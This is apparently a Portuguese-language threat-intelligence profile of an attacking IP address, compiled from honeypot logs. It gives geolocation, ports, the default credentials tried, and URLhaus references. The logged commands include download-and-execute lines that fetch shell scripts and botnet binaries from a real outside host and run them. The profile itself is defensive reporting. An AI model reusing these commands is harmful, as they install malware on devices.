Ameaca Ativa • MEDIO
176.65.148.45
Pais de Origem🇳🇱 Paises Bajos
Primeira Deteccao15/01/2026
Ultima Atividade15/01/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
46
Ataques Totais
🔌
2
Portas
📡
2
Tipos de Ataque
🦠
9
Malware
Geolocalizacao
- Pais
- 🇳🇱 Paises Bajos
- Cidade
- Eygelshoven
- ASN
- AS51396
- ISP
- Pfcloud UG (haftungsbeschrankt)
Tipos de Ataque
adbhoney
cowrie
Portas Atacadas
555523
Malware Associado
Credenciais Tentadas
🔐admin/admin
1x🔐root/admin
1xComandos Executados
$
cd /data/local/tmp/; busybox wget http://82.221.139.173:3712/w.sh; sh w.sh; curl http://82.221.139.173:3712/c.sh; sh c.sh; wget http://82.221.139.173:3712/wget.sh; sh wget.sh; curl http://82.221.139.173:3712/wget.sh; sh wget.sh; busybox wget http://82.221.139.173:3712/wget.sh; sh wget.sh; busybox curl http://82.221.139.173:3712/wget.sh; sh wget.sh5x$
cd /tmp;rm -rf RANGER2x$
wget http://82.221.139.173:3712/bins/systemx64.arm;chmod 777 systemx64.arm;./systemx64.arm TELNETarm2x$
rm -rf RANGER1x$
wget http://82.221.139.173:3712/bins/systemx64.spc;chmod 777 systemx64.spc;./systemx64.spc TELNETspc1x$
wget http://82.221.139.173:3712/bins/systemx64.sh4;chmod 777 systemx64.sh4;./systemx64.sh4 TELNETsh41x$
wget http://82.221.139.173:3712/bins/systemx64.arm7;chmod 777 systemx64.arm7;./systemx64.arm7 TELNETarm71x$
wget http://82.221.139.173:3712/bins/systemx64.x86;chmod 777 systemx64.x86;./systemx64.x86 TELNETx861x$
wget http://82.221.139.173:3712/bins/systemx64.mpsl;chmod 777 systemx64.mpsl;./systemx64.mpsl TELNETmpsl1xURLhaus Intel3 URLsabuse.ch
Este IP usou as seguintes URLs maliciosas conhecidas:
http://82.221.139.173:3712/c.shofflinemalware_downloadgeofencedopendirsh
http://82.221.139.173:3712/wget.shofflinemalware_downloadgeofencedopendirsh
http://82.221.139.173:3712/w.shofflinemalware_downloadgeofencedopendirsh
Avaliacao de Risco
45
/100
BaixoMedioAltoCritico